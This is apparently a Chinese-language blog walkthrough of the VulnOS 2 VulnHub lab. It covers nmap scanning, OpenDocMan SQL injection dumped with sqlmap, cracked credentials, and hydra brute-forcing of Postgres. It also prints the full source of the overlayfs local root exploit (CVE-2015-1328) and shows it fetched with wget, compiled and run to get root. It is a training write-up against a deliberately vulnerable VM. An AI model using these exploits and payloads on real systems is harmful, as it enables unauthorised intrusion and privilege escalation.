vulnhub靶机渗透[vulnos-2]

Posted on 2020-04-17 Edited on 2020-08-17 In vulnhub walkthrough Views: Word count in article: 4.1k Reading time ≈ 15 mins.

名称

名称：VulnOS: 2
发布日期：2016年5月17日

下载

VulnOSv2.7z

Download (Mirror): https://download.vulnhub.com/vulnos/VulnOSv2.7z
Download (Torrent): https://download.vulnhub.com/vulnos/VulnOSv2.7z.torrent

描述

VulnOS是打包为虚拟映像的一系列易受攻击的操作系统，以增强渗透测试技能

这是版本2-体积更小，混乱更少！由于时间并不总是站在我这一边，因此花了很长时间创建另一个VulnOS。但是喜欢创建它们。该映像是使用VBOX构建的。解压缩文件并将其添加到虚拟化软件中。

任务是渗透公司网站，获取系统root权限并得到最终的flag

注意：当前的键盘首选项为“pentesting是一个广泛的概念”如果有任何疑问，请随时通过m4db33f@gmail.com联系。向Vulnhub测试团队大声疾呼！希望你喜欢。

信息收集

上nmap

root@kali:~# nmap -sn -v 192.168.56.*
Nmap scan report for 192.168.56.104
Host is up (0.00031s latency).
MAC Address: 08:00:27:57:4F:AA (Oracle VirtualBox virtual NIC)

root@kali:~# nmap -sV -p- -v 192.168.56.104
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
6667/tcp open  irc     ngircd

root@kali:~# nmap -p 22,80,6667 -sV -v -A -T4 --script=vuln 192.168.56.104
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.104
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.56.104:80/jabc/?q=node/6
|     Form id: commerce-cart-add-to-cart-form-3
|     Form action: /jabc/?q=node/6
|     
|     Path: http://192.168.56.104:80/jabc/?q=node/4
|     Form id: commerce-cart-add-to-cart-form-1
|     Form action: /jabc/?q=node/4
|     
|     Path: http://192.168.56.104:80/jabc/?q=node/5
|     Form id: commerce-cart-add-to-cart-form-2
|_    Form action: /jabc/?q=node/5
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.56.104:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.56.104:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.56.104:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.56.104:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.56.104:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.56.104:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.56.104:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.56.104:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.56.104:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.56.104:80/jabc/misc/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.56.104:80/jabc/misc/?C=N%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.56.104:80/jabc/misc/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.56.104:80/jabc/misc/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.56.104:80/jabc/misc/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.56.104:80/jabc/misc/?C=M%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.56.104:80/jabc/misc/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.56.104:80/jabc/misc/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.56.104:80/jabc/misc/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.56.104:80/jabc/misc/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.56.104:80/jabc/misc/?C=M%3bO%3dA%27%20OR%20sqlspider
|_    http://192.168.56.104:80/jabc/misc/?C=D%3bO%3dA%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
6667/tcp open  irc     ngircd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_irc-unrealircd-backdoor: Server closed connection, possibly due to too many reconnects. Try again with argument irc-unrealircd-backdoor.wait set to 100 (or higher if you get this message again).

浏览器访问80端口的website链接

1	http://192.168.56.104/jabc/

在此网页中，有许多选项卡，浏览了每个选项卡，包括其页面来源，除了最后一个选项卡（文档）之外，什么也没找到。

当查看页面源代码时，服务器上将显示一行“/jabd0cs/”。只需用guest/guest登录即可

因此，打开目录并使用guest：guest作为用户名：password登录。

并且有一个上载选项，但有一个限制，即只能上载.doc文件，因此它几乎没有用。

如果观察登录页面，则有一个cms OpenDocMan v1.2.7。此版本的opendocman容易受到攻击。

搜索一下可用于opendocman的漏洞利用方法。对于这种类型：

root@kali:~# searchsploit OpenDocMan 1.2.7
------------------------------------------------------------------------------------ ----------------------------------------
 Exploit Title                                                                      |  Path
                                                                                    | (/usr/share/exploitdb/)
------------------------------------------------------------------------------------ ----------------------------------------
OpenDocMan 1.2.7 - Multiple Vulnerabilities                                         | exploits/php/webapps/32075.txt
------------------------------------------------------------------------------------ ----------------------------------------
Shellcodes: No Result

从其结果中，发现了利用32075.txt的漏洞，该漏洞显示“由于对“/ajax_udf.php”脚本中的“add_value” HTTP GET参数的验证不足而存在该漏洞。远程未经身份验证的攻击者可以在应用程序的数据库中执行任意SQL命令。”

现在查看一下exploit

root@kali:~# cat /usr/share/exploitdb/exploits/php/webapps/32075.txt
Advisory ID: HTB23202
Product: OpenDocMan
Vendor: Free Document Management Software
Vulnerable Version(s): 1.2.7 and probably prior
Tested Version: 1.2.7
Advisory Publication: February 12, 2014 [without technical details]
Vendor Notification: February 12, 2014
Vendor Patch: February 24, 2014
Public Disclosure: March 5, 2014
Vulnerability Type: SQL Injection [CWE-89], Improper Access Control [CWE-284]
CVE References: CVE-2014-1945, CVE-2014-1946
Risk Level: High
CVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

------------------------------------------------------------------------
-----------------------

Advisory Details:
                                                                                                                             
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in OpenDocMan, which can be exploited to perform SQL Injection and gain administrative access to the application.                                                              

1) SQL Injection in OpenDocMan: CVE-2014-1945

The vulnerability exists due to insufficient validation of "add_value" HTTP GET parameter in "/ajax_udf.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.

The exploitation example below displays version of the MySQL server:

http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,v
ersion%28%29,3,4,5,6,7,8,9

2) Improper Access Control in OpenDocMan: CVE-2014-1946

The vulnerability exists due to insufficient validation of allowed action in "/signup.php" script when updating userâ??s profile. A remote authenticated attacker can assign administrative privileges to the current account and gain complete control over the application.

The exploitation example below assigns administrative privileges for the current account:

<form action="http://[host]/signup.php" method="post" name="main">
<input type="hidden" name="updateuser" value="1">
<input type="hidden" name="admin" value="1">
<input type="hidden" name="id" value="[USER_ID]">
<input type="submit" name="login" value="Run">
</form>

------------------------------------------------------------------------
-----------------------

Solution:

Update to OpenDocMan v1.2.7.2

More Information:
http://www.opendocman.com/opendocman-v1-2-7-1-release/
http://www.opendocman.com/opendocman-v1-2-7-2-released/

------------------------------------------------------------------------
-----------------------

References:

[1] High-Tech Bridge Advisory HTB23202 - https://www.htbridge.com/advisory/HTB23202 - Multiple vulnerabilities in OpenDocMan.
[2] OpenDocMan - http://www.opendocman.com/ - Open Source Document Management System written in PHP.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVEÂ® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWebÂ® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.

------------------------------------------------------------------------
-----------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

现在，使用sqlmap来查找用户名和密码的数据库，像下面这样：

该操作使用了burp中与sqlmap联动的插件，右键可以直接注入

跑库

D:\burpcn2.0\BurpSuite_pro_v2.1\BurpSuite_pro_v2.1>sqlmap.py -r C:\Users\HASEE\AppData\Local\Temp\\1587350985142.req --level 5 --risk 3 --dbs
available databases [6]:
[*] drupal7
[*] information_schema
[*] jabcd0cs
[*] mysql
[*] performance_schema
[*] phpmyadmin

跑表

D:\burpcn2.0\BurpSuite_pro_v2.1\BurpSuite_pro_v2.1>sqlmap.py -r C:\Users\HASEE\AppData\Local\Temp\\1587350985142.req --level 5 --risk 3 -D jabcd0cs --tables
Database: jabcd0cs
[15 tables]
+-------------------+
| odm_access_log    |
| odm_admin         |
| odm_category      |
| odm_data          |
| odm_department    |
| odm_dept_perms    |
| odm_dept_reviewer |
| odm_filetypes     |
| odm_log           |
| odm_odmsys        |
| odm_rights        |
| odm_settings      |
| odm_udf           |
| odm_user          |
| odm_user_perms    |
+-------------------+

跑用户名和密码的hash值

D:\burpcn2.0\BurpSuite_pro_v2.1\BurpSuite_pro_v2.1>sqlmap.py -r C:\Users\HASEE\AppData\Local\Temp\\1587350985142.req --level 5 --risk 3 -D jabcd0cs -T odm_user --dump
Database: jabcd0cs
Table: odm_user
[2 entries]
+------+-------------+--------------------+----------+-----------+------------+------------------------------------------+------------+---------------+
| id   | phone       | Email              | username | last_name | first_name | password                                 | department | pw_reset_code |
+------+-------------+--------------------+----------+-----------+------------+------------------------------------------+------------+---------------+
| 1    | 5555551212  | webmin@example.com | webmin   | min       | web        | b78aae356709f8c31118ea613980954b         | 2          | <blank>       |
| 2    | 555 5555555 | guest@example.com  | guest    | guest     | guest      | 084e0343a0486ff05530df6c705c8bb4 (guest) | 2          | NULL          |
+------+-------------+--------------------+----------+-----------+------------+------------------------------------------+------------+---------------+

使用在线解密工具破解一下webmin的hash值

webmin/webmin1980

密码为webmin1980，用户名为webmin。通过SSH端口登录。在kali中打开一个新终端，然后键入：

root@kali:~# ssh webmin@192.168.56.104
The authenticity of host '192.168.56.104 (192.168.56.104)' can't be established.
ECDSA key fingerprint is SHA256:nIyyJRPJMy1g6F5m8AIT7W//x6lj3ZqhUbYuvSafKeI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.104' (ECDSA) to the list of known hosts.
Enter passphrase for key '/root/.ssh/id_rsa': 
webmin@192.168.56.104's password: 
Welcome to Ubuntu 14.04.4 LTS (GNU/Linux 3.13.0-24-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Mon Apr 20 04:13:19 CEST 2020

  System load: 0.15              Memory usage: 2%   Processes:       57
  Usage of /:  5.7% of 29.91GB   Swap usage:   0%   Users logged in: 0

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Last login: Wed May  4 10:41:07 2016
$ id
uid=1001(webmin) gid=1001(webmin) groups=1001(webmin)
$ whoami
webmin
$ uname -a
Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 i686 GNU/Linux

检查内核的版本，看看它是否容易受到攻击。

$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 14.04.4 LTS
Release:        14.04
Codename:       trusty

版本是14.04，表示可以被利用，并且适用于该类型：

root@kali:~# searchsploit ubuntu 14.04
------------------------------------------------------------------------------------ ----------------------------------------
 Exploit Title                                                                      |  Path
                                                                                    | (/usr/share/exploitdb/)
------------------------------------------------------------------------------------ ----------------------------------------
Apport (Ubuntu 14.04/14.10/15.04) - Race Condition Privilege Escalation             | exploits/linux/local/37088.c
Apport 2.14.1 (Ubuntu 14.04.2) - Local Privilege Escalation                         | exploits/linux/local/36782.sh
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / Ce | exploits/linux_x86-64/local/42275.c
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso | exploits/linux_x86/local/42276.c
Linux Kernel (Ubuntu 14.04.3) - 'perf_event_open()' Can Race with execve() (Access  | exploits/linux/local/39771.txt
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Pri | exploits/linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Pri | exploits/linux/local/37293.txt
Linux Kernel 3.x (Ubuntu 14.04 / Mint 17.3 / Fedora 22) - Double-free usb-midi SMEP | exploits/linux/local/41999.txt
Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Local Privilege Escalation (1 | exploits/linux/local/39166.c
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privile | exploits/linux_x86-64/local/40871.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Con | exploits/linux/local/47170.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalat | exploits/linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Loc | exploits/linux/local/47169.c
NetKit FTP Client (Ubuntu 14.04) - Crash/Denial of Service (PoC)                    | exploits/linux/dos/37777.txt
Ubuntu 14.04/15.10 - User Namespace Overlayfs Xattr SetGID Privilege Escalation     | exploits/linux/local/41762.txt
WebKitGTK 2.1.2 (Ubuntu 14.04) - Heap based Buffer Overflow                         | exploits/linux/local/44204.md
usb-creator 0.2.x (Ubuntu 12.04/14.04/14.10) - Local Privilege Escalation           | exploits/linux/local/36820.txt
------------------------------------------------------------------------------------ ----------------------------------------

列出了许多可以利用的漏洞，从其中选择37292.c作为overlayfs的“本地提权”。

1	Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Pri \| exploits/linux/local/37292.c

查看exploit

root@kali:~# cat /usr/share/exploitdb/exploits/linux/local/37292.c
/*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328     (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)

*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNT

user@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user@ubuntu-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)

greets to beist & kaliman
2015-05-24
%rebel%
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <signal.h>
#include <fcntl.h>
#include <string.h>
#include <linux/sched.h>

#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n    return _real_getuid();\n}\n"

static char child_stack[1024*1024];

static int
child_exec(void *stuff)
{
    char *file;
    system("rm -rf /tmp/ns_sploit");
    mkdir("/tmp/ns_sploit", 0777);
    mkdir("/tmp/ns_sploit/work", 0777);
    mkdir("/tmp/ns_sploit/upper",0777);
    mkdir("/tmp/ns_sploit/o",0777);

    fprintf(stderr,"mount #1\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
            fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
            exit(-1);
        }
        file = ".access";
        chmod("/tmp/ns_sploit/work/work",0777);
    } else file = "ns_last_pid";

    chdir("/tmp/ns_sploit/o");
    rename(file,"ld.so.preload");

    chdir("/");
    umount("/tmp/ns_sploit/o");
    fprintf(stderr,"mount #2\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
            exit(-1);
        }
        chmod("/tmp/ns_sploit/work/work",0777);
    }

    chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
    umount("/tmp/ns_sploit/o");
}

int
main(int argc, char **argv)
{
    int status, fd, lib;
    pid_t wrapper, init;
    int clone_flags = CLONE_NEWNS | SIGCHLD;

    fprintf(stderr,"spawning threads\n");

    if((wrapper = fork()) == 0) {
        if(unshare(CLONE_NEWUSER) != 0)
            fprintf(stderr, "failed to create new user namespace\n");

        if((init = fork()) == 0) {
            pid_t pid =
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
            if(pid < 0) {
                fprintf(stderr, "failed to create new mount namespace\n");
                exit(-1);
            }

            waitpid(pid, &status, 0);

        }

        waitpid(init, &status, 0);
        return 0;
    }

    usleep(300000);

    wait(NULL);

    fprintf(stderr,"child threads done\n");

    fd = open("/etc/ld.so.preload",O_WRONLY);

    if(fd == -1) {
        fprintf(stderr,"exploit failed\n");
        exit(-1);
    }

    fprintf(stderr,"/etc/ld.so.preload created\n");
    fprintf(stderr,"creating shared library\n");
    lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
    write(lib,LIB,strlen(LIB));
    close(lib);
    lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
    if(lib != 0) {
        fprintf(stderr,"couldn't create dynamic library\n");
        exit(-1);
    }
    write(fd,"/tmp/ofs-lib.so\n",16);
    close(fd);
    system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
    execl("/bin/su","su",NULL);
}

将exploit拷贝一份过来然后传输到目标机器上编译并运行

root@kali:~/vulnhub/vulnos-2# cp /usr/share/exploitdb/exploits/linux/local/37292.c .
root@kali:~/vulnhub/vulnos-2# ls
37292.c
root@kali:~/vulnhub/vulnos-2# python -m SimpleHTTPServer 
Serving HTTP on 0.0.0.0 port 8000 ...                                                                                      
192.168.56.1 - - [19/Apr/2020 23:29:04] code 404, message File not found                                                   
192.168.56.1 - - [19/Apr/2020 23:29:04] "GET /robots.txt HTTP/1.1" 404 -                                                     
192.168.56.1 - - [19/Apr/2020 23:29:04] "GET / HTTP/1.1" 200 -
192.168.56.1 - - [19/Apr/2020 23:29:04] code 404, message File not found
192.168.56.1 - - [19/Apr/2020 23:29:04] "GET /favicon.ico HTTP/1.1" 404 -
192.168.56.104 - - [19/Apr/2020 23:29:54] "GET /37292.c HTTP/1.1" 200 -

受害机器运行

$ wget http://192.168.56.102:8000/37292.c
--2020-04-20 05:29:53--  http://192.168.56.102:8000/37292.c
Connecting to 192.168.56.102:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5119 (5.0K) [text/plain]
Saving to: ‘37292.c’

100%[===================================================================================>] 5,119       --.-K/s   in 0s      

2020-04-20 05:29:53 (895 MB/s) - ‘37292.c’ saved [5119/5119]

$ ls
37292.c
$ chmod 777 *
$ ls -la
total 16
drwxrwxrwx  2 root   root   4096 Apr 20 05:29 .
drwxr-xr-x 21 root   root   4096 Apr  3  2016 ..
-rwxrwxrwx  1 webmin webmin 5119 Apr 20 05:28 37292.c

编译并执行程序

$ chmod 777 *
$ ls -la
total 16
drwxrwxrwx  2 root   root   4096 Apr 20 05:29 .
drwxr-xr-x 21 root   root   4096 Apr  3  2016 ..
-rwxrwxrwx  1 webmin webmin 5119 Apr 20 05:28 37292.c
$ gcc 37292.c -o shell
$ ls -la
total 28
drwxrwxrwx  2 root   root    4096 Apr 20 05:30 .
drwxr-xr-x 21 root   root    4096 Apr  3  2016 ..
-rwxrwxrwx  1 webmin webmin  5119 Apr 20 05:28 37292.c
-rwxrwxr-x  1 webmin webmin 12193 Apr 20 05:30 shell
$ ./shell 
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1001(webmin)
# whoami
root
# cd /root
# ls
flag.txt
# cat flag.txt
Hello and welcome.
You successfully compromised the company "JABC" and the server completely !!
Congratulations !!!
Hope you enjoyed it.

What do you think of A.I.?

成功得到root权限并获取了flag

其它getshell尝试

使用之前的webmin账号密码登录web界面后，还可以添加上传文件的类型，从而上传php脚本文件

成功上传php脚本文件后，访问它发现脚本文件并不能被解析

其它获取root权限的方法

/home/webmin目录下有一个post.tar.gz文件

解压后似乎是“hydra”的复制品。这是为什么呢?
执行“netstat -antp”命令，会看到只有mysql(port3306)和postgresql(5432)数据库服务在本地运行，仅在127.0.0.1上运行。

有一个hydra的本地副本、一个密码bruteforcer和一个仅在本地运行的服务。
首先输入目录“post”，通过输入命令“
./在“make”后面加上“configure”。没有义务去做“安装”，取决于你。
make就可以了。
键入./hydra——帮助检查是否一切正常。

首先在端口5432上强制本地postgres数据库。
为了简单，使用metasploit-framework提供的字典列表“postgres_default_pass.txt”。
只需要在目标机器上获取字典列表。
本地攻击机器上启动apache webserver，将字典列表复制到公共html文件夹中，然后作为目标机器上的“webmin”用户进入shell。

然后启动hydra爆破

成功!现在知道postgresql数据库的用户凭证是postgres:posgtres。
仍然以“webmin”的身份登录到postgresql数据库，四处浏览。

\c system

\dt

select * from users;

得到了username

1	vulnosadmin

password

1	c4nuh4ckm3tw1c3

成功登录了ssh

root@kali:~# ssh vulnosadmin@192.168.56.104
Enter passphrase for key '/root/.ssh/id_rsa': 
vulnosadmin@192.168.56.104's password: 
Welcome to Ubuntu 14.04.4 LTS (GNU/Linux 3.13.0-24-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Mon Apr 20 05:11:47 CEST 2020

  System load:  0.0               Processes:           86
  Usage of /:   5.8% of 29.91GB   Users logged in:     0
  Memory usage: 16%               IP address for eth0: 192.168.56.104
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Last login: Wed May  4 19:35:16 2016 from 192.168.56.101
vulnosadmin@VulnOSv2:~$ id
uid=1000(vulnosadmin) gid=1000(vulnosadmin) groups=1000(vulnosadmin),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),111(sambashare)
vulnosadmin@VulnOSv2:~$ whoami
vulnosadmin

在用户“vulnosadmin”的主目录中发现了一个奇怪的文件。

查看它，似乎是一个blender3D文件。Blender 3D是一款三维建模和动画制作软件。

1 2	vulnosadmin@VulnOSv2:~$ ls r00t.blend

如果在blender中打开文件，会看到一个3D立方体。以实模式显示。

都得到了一个字符串，尝试用作root密码登录ssh

1	ab12fg//drg

vulnosadmin@VulnOSv2:~$ su root
Password: 
root@VulnOSv2:/home/vulnosadmin# id
uid=0(root) gid=0(root) groups=0(root)
root@VulnOSv2:/home/vulnosadmin# whoami
root
root@VulnOSv2:/home/vulnosadmin# cd /root
root@VulnOSv2:~# ls
flag.txt
root@VulnOSv2:~# cat flag.txt
Hello and welcome.
You successfully compromised the company "JABC" and the server completely !!
Congratulations !!!
Hope you enjoyed it.

What do you think of A.I.?